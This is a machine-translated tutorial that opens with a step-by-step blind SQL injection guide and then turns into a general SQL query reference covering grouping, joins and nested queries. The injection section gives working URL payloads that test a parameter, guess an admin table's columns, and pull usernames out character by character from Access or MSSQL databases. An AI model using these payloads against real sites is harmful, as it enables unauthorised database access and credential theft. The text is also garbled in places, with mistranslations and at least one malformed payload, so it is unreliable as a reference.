Quick learning and understanding of SQL Injection Technology

Source: age and month Alliance

Detect whether injection can be performed
Http: // 127.0.0.1/xx? Id = 11 and 1 = 1 (normal page)
Http: // 127.0.0.1/xx? Id = 11 and 1 = 2 (error page)

Detection Table Section

Http: // 127.0.0.1/xx? Id = 11 and exists (select * from admin)

Detection field

Http: // 127.0.0.1/xx? Id = 11 and exists (select username from admin)

Detection ID

Http: // 127.0.0.1/xx? Id = 11 and exists (select id from admin where ID = 1)

Detection Length

Http: // 127.0.0.1/xx? Id = 11 and exists (select id from admin where len (username) = 5 and ID = 1)

Detection Length

Http: // 127.0.0.1/xx? Id = 11 and exists (select id from admin where len (username) = 5 and ID = 1)

Check whether the database is MSSQL

Http: // 127.0.0.1/xx? Id = 11 and exists (select * from sysobjects)

Check whether it is in English

(ACCESS database)
Http: // 127.0.0.1/xx? Id = 11 and exists (select id from admin where asc (mid (username, 1, 1) between 30 and 130 and ID = 1)

(MSSQL database)
Http: // 127.0.0.1/xx? Id = 11 and exists (select id from admin where unicode (substring (username, 1, 1) between 30 and 130 and ID = 1)

Check English Scope

(ACCESS database)
Http: // 127.0.0.1/xx? Id = 11 and exists (select id from admin where asc (mid (username, 1, 1) between 90 and 100 and ID = 1)

(MSSQL database)
Http: // 127.0.0.1/xx? Id = 11 and exists (select id from admin where unicode (substring (username, 100) between 90 and ID = 1)

Check the character

(ACCESS database)
Http: // 127.0.0.1/xx? Id = 11 and exists (select id from admin where asc (mid (username, 1, 1) = 97 and ID = 1)

(MSSQL database)
Http: // 127.0.0.1/xx? Id = 11 and exists (select id from admin where unicode (substring (username, 1, 1) = 97 and ID = 1)

Common functions

Access: asc (character) SQLServer: unicode (character)
Purpose: return the ASCII code of a character.

Access: chr (number) SQLServer: nchar (number)
Function: opposite to asc, returns Characters Based on the ASCII code.

Access: mid (string, N, L) SQLServer: substring (string, N, L)
Purpose: return the substring of the string that starts from N characters and ranges from N to N + L.

Access: abc (number) SQLServer: abc (number)
Purpose: return the absolute value of a number (used to guess Chinese characters)

Access: A between B And C SQLServer: A between B And C
Purpose: Determine whether A is between B and C.

And exists (Select top 1 * From user order by id)

1. display the column name in the query results:
A. Use the as Keyword: select name as name from students order by age
B. Direct representation: select name from students order by age

2. Exact search:
A. Use in to specify the range: select * from students where native in (Hunan, Sichuan)
B. between... and: select * from students where age between 20 and 30
C. "=": select * from students where name = Li Shan
D. like: select * from students where name like Li %, that is, search for matching items starting with "Li. Therefore, to query all objects with "Li", run the following command: % Li %; if the second word is Li, it should be _ Li % or _ Li _.)
E. [] match check character: select * from courses where cno like [AC] % (the relationship between or and "in (...) "similar, and" [] "can represent a range, such as: select * from courses where cno like [A-C] %)

3. Processing Time type variables
A. smalldatetime: process the data directly by string. For example, select * from students where birth> = 1980-1-1 and birth <= 1980-12-31

4. Set Functions
A. count () summation, for example: select count (*) from students (total number of students)
B. avg (column) calculates the mean, for example, select avg (mark) from grades where cno = 'b2'
C. max (column) and min (column), max and min

5. group
Commonly used in statistics, such as the total number of group queries: select gender, count (sno) from students group by gender (view the number of male and female students)
Note: from which point of view the group is, from which column "group"
For multiple groups, you only need to list the grouping rules. For example, to query the number of male and female students in each major, the grouping rules are as follows: Session (grade), major (mno), and
Gender, so there are "group by grade, mno, gender"
Select grade, mno, gender, count (*) from students group by grade, mno, gender
Normally, group is also used with having. For example, if a student who fails to take more than one course is queried, the student IDs are classified by student ID (sno) as follows:
Select sno, count (*) from grades where mark <60 group by sno having count (*)> 1

6. UNION
Merge query results, such:
SELECT * FROM students WHERE name like 'zhang % 'UNION [ALL] SELECT * FROM students WHERE name like' Li %'

7. Multi-Table query
A. Internal Connection
Select g. sno, s. name, c. coursename from grades g JOIN students s ON g. sno = s. sno JOIN courses c ON g. cno = c. cno
(Note that aliases can be referenced)
B. External Connection
B1. left join
Select courses. cno, max (coursename), count (sno) from courses left join grades ON courses. cno = grades. cno group by courses. cno
Left join feature: displays all items in all left tables, even if some of the items are not completely filled in.

The left Outer Join returns the rows that exist in the left table but do not exist in the right table, plus the rows of the inner join.
B2. right join
Similar to left join
B3. full connection
Select sno, name, major from students full join majors ON students. mno = majors. mno
Show all content in both tables
C. Self-connection
Select c1.cno, c1.coursename, c1.pno, c2.coursename from courses c1, courses c2 where c1.pno = c2.cno
Use aliases to solve the problem.
D. Submit * connection
Select lastname + firstname from lastname cross join firstanme
Equivalent to playing the flute Product

8. nested Query
A. Use the keyword IN, for example, to query the hometown of pig Hill:
Select * from students where native in (select native from students where name = 'pipig ')
B. Use the keyword EXIST. For example, the following two sentences are equivalent:
Select * from students where sno in (select sno from grades where cno = 'b2 ')

Select * from students where exists (select * from grades where grades. sno = students. sno AND cno = 'b2 ')

9. sorting order
A. There are two methods for sorting order: asc Ascending order and desc descending order.
B. sorting order can be arranged according to a certain item in the query condition, and this can be represented by numbers, such:
Select sno, count (*), avg (mark) from grades group by sno having avg (mark)> 85 order by 3

10. Others
A. names with spaces should be enclosed.
B. You can use null to determine specific queries without data in a column, such as select sno and courseno from grades where mark IS NULL.
C. Differentiate the differences between any and all used in nested queries. any is equivalent to the logical operation "|", while all is equivalent to the logical operation "&".
D. Be careful when querying negative meanings:
For example, students who have not taken the 'b2' course:
Select students. * from students, grades where students. sno = grades. sno AND grades. cno <> 'b2'
The preceding query method is incorrect. For the correct method, see the following:
Select * from students where not exists (select * from grades where grades. sno = students. sno AND cno = B2)

11. solutions to difficult multi-nested queries: for example, students who have taken all courses:
Select * from students where not exists (select * from courses where not exists (select * from grades where sno = students. sno AND cno = courses. cno ))
Exclusive: select from the student table to exclude those with no courses. Use not exist. Because the subject is a course, you can find the second query in the course table and exclude those that have selected the course.